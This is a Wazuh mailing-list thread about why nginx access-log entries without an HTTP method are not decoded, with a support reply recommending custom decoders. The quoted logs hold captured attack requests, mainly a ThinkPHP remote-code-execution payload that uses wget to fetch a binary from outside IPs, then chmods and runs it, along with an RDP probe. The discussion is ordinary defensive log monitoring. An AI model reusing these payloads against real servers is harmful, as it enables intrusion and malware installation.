Incomplete HTTP request in NGINX log is not decoded
185 views
Skip to first unread message
Haekal
Sep 25, 2023, 12:53:07 AM9/25/23
to Wazuh | Mailing List
I've configured Wazuh to monitor the nginx access.log file, but I've noticed that some logs are not captured by the Wazuh decoder and thus don't appear in the Wazuh web user interface. Below are some examples of these 'bad' logs:
```
9.12.57.140 - - [24/Sep/2023:11:19:08 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1" 400 166 "-" "Tsunami/2.0"
0.66.88.204 - - [24/Sep/2023:12:33:09 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-"
```
9.12.57.140 - - [24/Sep/2023:11:19:08 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1" 400 166 "-" "Tsunami/2.0"
0.66.88.204 - - [24/Sep/2023:12:33:09 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-"
12.163.122.111 - - [24/Sep/2023:12:54:40 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://159.223.22.86/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"
0.66.88.204 - - [24/Sep/2023:15:02:13 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
37.184.255.33 - - [24/Sep/2023:16:13:09 +0700] "MGLNDD_95.217.128.110_80" 400 166 "-" "-"
```
Upon inspecting the `0375-web-accesslog_decoders.xml`file, I noticed that the above logs lack the HTTP method required to satisfy the prematch condition.
I have made a custom decoder to handle those exceptions but is there a particular reason why Wazuh doesn't have a decoder for these logs in the first place?
```
Upon inspecting the `0375-web-accesslog_decoders.xml`file, I noticed that the above logs lack the HTTP method required to satisfy the prematch condition.
I have made a custom decoder to handle those exceptions but is there a particular reason why Wazuh doesn't have a decoder for these logs in the first place?
Stuti Gupta
Sep 25, 2023, 1:14:46 AM9/25/23
to Wazuh | Mailing List
Hi, Haekal,
Hope you are doing well today and thank you for using wazuh
Wazuh's default decoders are designed to be as generic as possible so that they can handle a wide range of log formats. However, this means that they may not be able to handle all possible log formats, especially those that are very specific or unusual. The logs that you have provided are examples of logs that are not handled by Wazuh's default decoders. These logs lack the HTTP method required to satisfy the prematch condition, which means that the decoders cannot identify them as Nginx access logs. Creating a decoder for every possible non-standard log entry would be impractical, as there can be an infinite number of variations. Therefore, Wazuh provides the flexibility for users to create custom decoders to handle their specific use cases. You have created a custom decoder to handle these logs, which is a good solution.
For custom rules and decoders please refer to https://documentation.wazuh.com/current/user-manual/ruleset/custom.html
Hope this will help. Please feel free to contact us for any information/issues.
Regards,
Stuti Gupta
Hope you are doing well today and thank you for using wazuh
Wazuh's default decoders are designed to be as generic as possible so that they can handle a wide range of log formats. However, this means that they may not be able to handle all possible log formats, especially those that are very specific or unusual. The logs that you have provided are examples of logs that are not handled by Wazuh's default decoders. These logs lack the HTTP method required to satisfy the prematch condition, which means that the decoders cannot identify them as Nginx access logs. Creating a decoder for every possible non-standard log entry would be impractical, as there can be an infinite number of variations. Therefore, Wazuh provides the flexibility for users to create custom decoders to handle their specific use cases. You have created a custom decoder to handle these logs, which is a good solution.
For custom rules and decoders please refer to https://documentation.wazuh.com/current/user-manual/ruleset/custom.html
Hope this will help. Please feel free to contact us for any information/issues.
Regards,
Stuti Gupta
Reply all
Reply to author
Forward
0 new messages